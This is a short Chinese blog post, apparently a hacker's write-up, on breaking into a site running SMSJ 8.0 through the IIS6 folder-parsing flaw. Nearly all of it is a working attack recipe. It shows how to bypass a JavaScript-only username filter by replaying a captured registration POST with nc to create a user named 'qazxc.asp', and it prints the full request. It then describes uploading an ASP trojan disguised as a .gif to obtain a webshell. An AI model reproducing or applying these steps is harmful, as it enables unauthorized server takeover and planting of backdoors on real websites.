帮朋友检测网站的安全性,用的是SMSJ Version 8.0,号称仿阿里巴巴的东西,注册企业会员后,登录管理,发现上传图片会归类到一个http://www.rover.com/UserDocument/你注册的会员帐号/picture/的目录里不由让人浮想联翩,想起早期动易的那个注册漏洞
说起这个漏洞,完全是iis6引起的,在iis6的站点上,建立一个xx.asp的文件夹,然后在里面放一个改成gif后缀的asp木马,照样会按asp来执行,看了下服务器,八成是win2003,也就是iis6了然后我试着注册rover.asp的用户,注册那里到是过滤了特殊字符的,但是看了下,只是用简单的javascript限制的
代码如下:
function checkdata() {
if( isNumberString(addform.user.value,"1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_")!=1 || addform.user.value.length<2 || addform.user.value.length>16) {
alert("用户注册出错,下面是产生错误的可能原因:n ·用户名必须是2-16位的数字、英文或下划线")
return false;
ok,抓包,然后用nc提交,直接绕过
抓包内容
POST /reg_save.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.rover.com/reg.asp?action=reg
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322;
.NET CLR 2.0.50727)
Host: www.rover.com
Content-Length: 230
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDASQCACRB=FELPBKLAJDFPOKOPFBDEKGMB; cnzz02=1; rtime=0;
ltime=1206546036500; cnzz_eid=96831333-
user=qazxc.asp&pass=1234567&pass1=1234567&ypxxone_id=8&ypxxtwo_id=136&coname=rover&colxr=a
dmin&colxrsex=%CF%C8%C9%FA&addone_id=17&addtwo_id=490&coaddress=xxxxx&cotelq=010&cotel=384
76564&mail=icerover@msn.com&vip=3&img.x=58&img.y=17
nc ip 80成功注册,然后把asp木马改成gif后缀,当图片上传上去
http://www.rover.com/UserDocument/qazxc.asp/Picture/20080326.gif
自此得到webshell,over~最近懒的说话,懒得修饰文笔,看不懂的就一直跳过跳过...
ps:漏洞很简单,好久不写字了,纯粹憋字而已,见笑了,此外,还可以本地提交注册